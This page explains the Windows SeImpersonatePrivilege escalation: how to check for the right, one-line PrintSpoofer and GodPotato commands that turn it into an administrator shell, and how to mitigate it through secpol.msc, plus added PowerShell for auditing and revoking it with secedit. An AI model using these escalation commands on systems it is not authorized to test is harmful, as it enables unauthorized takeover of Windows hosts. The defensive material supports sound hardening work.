Attacks - Windows Privilege Escalation

Abuse Privileges - SeImpersonatePrivilege

SeImpersonatePrivilege ("Impersonate a client after authentication") is a Windows user right that lets an account or program act as another user on the system: it can perform actions and access files or resources under that user's identity.

While this is useful for certain tasks, it can also be dangerous if it's not managed carefully. If the wrong user or program gets this privilege, they can use it to compromise the system and gain access they're not supposed to have.

Enumeration

whoami /priv
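As an added example (not part of the original page), the same check wrapped in a PowerShell function that parses the CSV form of whoami /priv and reports whether the current token holds the right. The function name is my own; the column names come from whoami's own CSV output.

```powershell
# Added example (not from the original page): check whether the current
# token holds SeImpersonatePrivilege by parsing `whoami /priv` in CSV form.
function Get-ImpersonatePrivilegeState {
    # whoami emits CSV with the columns "Privilege Name", "Description", "State"
    $privileges = whoami /priv /fo csv | ConvertFrom-Csv
    $row = $privileges | Where-Object { $_.'Privilege Name' -eq 'SeImpersonatePrivilege' }

    if (-not $row) {
        return [pscustomobject]@{ Held = $false; State = 'NotPresent' }
    }
    # A privilege listed as "Disabled" is still held by the token; a process only
    # has to enable it before use, so "Disabled" is not a protection.
    return [pscustomobject]@{ Held = $true; State = $row.State }
}

$result = Get-ImpersonatePrivilegeState
if ($result.Held) {
    Write-Warning "Token holds SeImpersonatePrivilege (state: $($result.State)); review why this account needs it"
} else {
    Write-Output 'SeImpersonatePrivilege is not present in the current token'
}
```

The point of the Disabled/Enabled distinction is the part people misread: the right is granted to the account whether or not a given process has it enabled, so an audit should treat any listed state as "held".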

Exploitation

Actually it's so easy that it's just one command to get Administrator privileges 🙂.

We will use PrintSpoofer

PrintSpoofer64.exe -i -c cmd

or with GodPotato

GodPotato-NET4.exe -cmd "cmd /c whoami"

That's it. 🎉

Mitigation

Follow the steps below to remove the SeImpersonatePrivilege from a user:

  1. Press Win + R to open the Run dialog, type secpol.msc, and hit Enter. This will open the Local Security Policy editor.

  2. In the Local Security Policy editor, navigate to Local Policies > User Rights Assignment.

  3. Look for the Impersonate a client after authentication policy (which corresponds to SeImpersonatePrivilege).

  4. Double-click the policy, and a properties window will appear.

  5. In the properties window, you can remove the user or group from the list to revoke the privilege. Click Apply and then OK to save the changes.
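The same audit and revocation done from the command line, as an added example that is not part of the original page. It uses secedit (the tool behind the Local Security Policy editor) to export the user-rights area, shows which accounts hold the right, and can rewrite the assignment and re-apply it. The function names, the temporary file paths under $env:TEMP and the placeholder SID in the commented-out call are my own assumptions; it must be run from an elevated prompt.

```powershell
# Added example (not from the original page): audit, and optionally revoke, the
# "Impersonate a client after authentication" right with secedit instead of the
# secpol.msc GUI. Run from an elevated PowerShell prompt.
$inf = Join-Path $env:TEMP 'user-rights.inf'   # assumed scratch paths
$db  = Join-Path $env:TEMP 'user-rights.sdb'

function Get-ImpersonateAssignment {
    # Export only the user-rights area of the local security policy to an INF file
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $line = Get-Content $inf | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
    if (-not $line) { return @() }
    # Line format: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
    # Entries prefixed with '*' are SIDs; anything else is an account name.
    $entries = ($line -split '=', 2)[1].Trim() -split ','
    foreach ($entry in $entries) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
            try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = '<unresolved>' }
            [pscustomobject]@{ Sid = $sid.Value; Account = $name }
        } else {
            [pscustomobject]@{ Sid = $null; Account = $entry }
        }
    }
}

function Remove-ImpersonateAssignment {
    param([Parameter(Mandatory)][string]$Sid)   # SID of the account to strip the right from
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $updated = Get-Content $inf | ForEach-Object {
        if ($_ -match '^SeImpersonatePrivilege\s*=') {
            $keep = (($_ -split '=', 2)[1].Trim() -split ',') | Where-Object { $_.Trim() -ne "*$Sid" }
            "SeImpersonatePrivilege = $($keep -join ',')"
        } else { $_ }
    }
    # secedit expects the INF in Unicode (UTF-16LE), which is what the export produced
    Set-Content -Path $inf -Value $updated -Encoding Unicode
    # Apply only the user-rights area; the rest of the local policy is untouched
    secedit /configure /db $db /cfg $inf /areas USER_RIGHTS
}

Get-ImpersonateAssignment | Format-Table -AutoSize
# Remove-ImpersonateAssignment -Sid 'S-1-5-21-<placeholder>-1104'   # placeholder SID, replace before use
```

Two caveats before revoking anything: the default holders (Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE) need the right for normal service operation, so the usual fix is to stop running an application under an account that holds it rather than to strip the defaults; and on a domain-joined host a GPO that defines this user right overwrites the local setting at the next policy refresh, so the change has to be made in the GPO instead.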